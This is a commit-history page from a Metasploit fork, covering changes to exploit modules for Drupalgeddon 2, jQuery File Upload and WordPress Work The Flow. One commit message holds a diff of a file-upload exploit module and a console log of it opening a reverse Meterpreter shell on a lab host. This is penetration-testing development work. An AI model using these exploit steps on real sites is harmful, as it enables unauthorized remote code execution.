adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
50,629 Commits 27 Branches 1,043 Tags
c48a6ddbdfc02bf92b8d4e247dbe89bdfba4e821
Commit Graph

1001 Commits

Author SHA1 Message Date
Brendan Coles 24f807490f revisionism 2019-01-10 19:19:14 +00:00
William Vu 90b9204703 Update DisclosureDate to ISO 8601 in my modules 
Basic msftidy fixer:

diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
     # Check disclosure date format
     if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
       d = $1  #Captured date
+      File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+      fixed('Probably updated traditional DisclosureDate to ISO 8601')
       # Flag if overall format is wrong
       if d =~ /^... (?:\d{1,2},? )?\d{4}$/
         # Flag if month format is wrong
 2018-11-16 12:18:28 -06:00
William Vu 67f2933b58 Make fewer assumptions about Apache 
Returning CheckCode::Safe is too aggressive for a supplemental check.
Admins can change the directive in top-level configuration, anyway.
 2018-10-23 16:26:17 -05:00
William Vu bdf2d44415 Augment check with Apache Server header 2018-10-23 07:04:14 -05:00
William Vu 0249f1a4af Improve check method and refactor 2018-10-23 06:20:31 -05:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links 
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
 2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure 
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
 2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods 
And also check upload response.
 2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request 
This ensures we don't block on execution.
 2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
William Vu 7bc98e0ea8 Fix formatting and convert a missed AKA reference 2018-10-05 03:22:08 -05:00
Rob 6f5a8f8f42 Fix outdated metadata 2018-10-01 18:59:09 +01:00
Erin Bleiweiss eb17d9b198 Refactor AKA references for modules 2018-08-31 16:56:05 -05:00
Wei Chen b899839c53 Oops I made boo-boos 2018-08-21 08:53:43 -05:00
Wei Chen 01ad152067 Update false negatives on post auth information 2018-08-20 16:05:58 -05:00
Wei Chen 3d0d8f7773 Update false negatives on post auth information 2018-08-20 15:43:07 -05:00
asoto-r7 1a3a4ef5e4 Revised 88 aux and exploit modules to add CVEs / references 2018-07-12 17:34:52 -05:00
Wei Chen 5fc5a47cd2 Update CVE references for exploit modules 
These are based on cross references by EDB, OSVDB, module short
name, blog post and BID.
 2018-07-08 18:46:04 -05:00
William Vu 88f09dc302 Update a few stragglers in Drupalgeddon 2 
1. I added a missed header and YARD to the Drupal mixin.
2. I decided to match discovered versions more liberally.
 2018-05-03 18:35:25 -05:00
William Vu 728d7bc065 Fix #9876, second round of Drupalgeddon 2 updates 
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
 2018-05-03 17:38:32 -05:00
William Vu 873cbcee27 Fix #9876, minor updates to Drupalgeddon 2 
1. Tested versions are already listed in the module doc, and we've
tested more than just 7.57 and 8.4.5 now. Removing a source of potential
inconsistency in the future.
2. No problem with ivars anymore. No idea what happened, but maybe I was
just too tired to code. Removing cleanup method.
 2018-04-25 18:09:54 -05:00
William Vu b8eb7f2a86 Set target type instead of regexing names 
We're no longer matching multiple targets like /In-Memory/ or /Dropper/,
so it makes sense to match on a specific value now.

Old matching in this commit: 1900aa2708.
 2018-04-25 11:53:26 -05:00
William Vu 910e9337fb Use print_good for patch level check, oops 2018-04-24 23:21:22 -05:00
William Vu b7ac16038b Correct comment about PHP CLI (it's not our last!) 2018-04-24 23:18:51 -05:00
William Vu ec43801564 Add check for patch level in CHANGELOG.txt 
Looks like 8.x has core/CHANGELOG.txt instead.
 2018-04-24 23:12:33 -05:00
William Vu 2ff0e597a0 Add SA-CORE-2018-002 as an AKA ref 
Makes sense to me. Even though it's technically the advisory.
 2018-04-24 22:51:33 -05:00
William Vu 8bc1417c8c Use PHP_FUNC as a fallback in case assert() fails 
Additionally drop a file in a writable directory in case CWD fails.
 2018-04-24 22:29:27 -05:00
William Vu 8ff4407ca6 Clarify version detection error message 
This was supposed to imply that we couldn't configure the exploit for a
targetable version. Instead, it just read weirdly. I think it was
missing "to target" at the end. "Determine" is a much better word,
though, since we may be doing detection instead of mere configuration.
 2018-04-24 20:51:51 -05:00
William Vu cfaca5baa3 Restore a return lost in the refactor :( 
Also spiff up comments.
 2018-04-24 11:25:55 -05:00
William Vu b507391f1b Change back to vprint_status for the nth time 
I really couldn't decide, especially once I got rid of CmdStager.

Also fully document the module options.
 2018-04-24 04:23:52 -05:00
William Vu c8b6482ab0 Rewrite PHP targets to work with 7.x and 8.x 
Win some, lose some. php -r spawns a new (obvious) command. :/

Check method and version detection also rewritten. :)
 2018-04-24 03:38:05 -05:00
William Vu 8be58d315c Stop being lazy about badchar analysis 
Badchars apply to all targets.
 2018-04-20 19:30:38 -05:00
William Vu fcfe927b7a Add PHP dropper functionality and targets 2018-04-19 05:11:21 -05:00
William Vu 62aca93d8b Cache version detection and print only once 
Oops. This is the problem with overloading methods.
 2018-04-19 04:59:07 -05:00
William Vu 2670d06f99 Add in-memory PHP execution using assert() 2018-04-19 02:18:56 -05:00
William Vu 7a2cc991ff Refactor once more with feeling 
Nested conditionals are the devil. Printing should be consistent now.
 2018-04-18 23:59:14 -05:00
William Vu 3d116d721d Add version detection and automatic targeting 
I also refactored error handling. Should be cleaner now.
 2018-04-18 21:40:22 -05:00
William Vu 86ffbc753e Refactor clean URL handling and remove dead code 2018-04-18 19:56:42 -05:00
William Vu 1900aa2708 Refactor module and address review comments 2018-04-17 19:05:45 -05:00
William Vu d8508b8d7d Add Drupal Drupalgeddon 2 2018-04-14 00:22:30 -05:00
Jacob Robles 0fa63ae7b3 Update documentation and module 
Included Super User in the documentation.
Implemented changes h00die suggested.
Modified sqli to generate strings used in regex.
 2018-03-28 10:57:28 -05:00
Luis Hernandez dddad415a5 add Msf::Exploit::Remote::HTTP::Joomla 2018-03-11 07:59:26 -05:00
Luis Hernandez 37bf4d118a Changes suggested by h00die 0803 2018-03-09 09:55:50 -05:00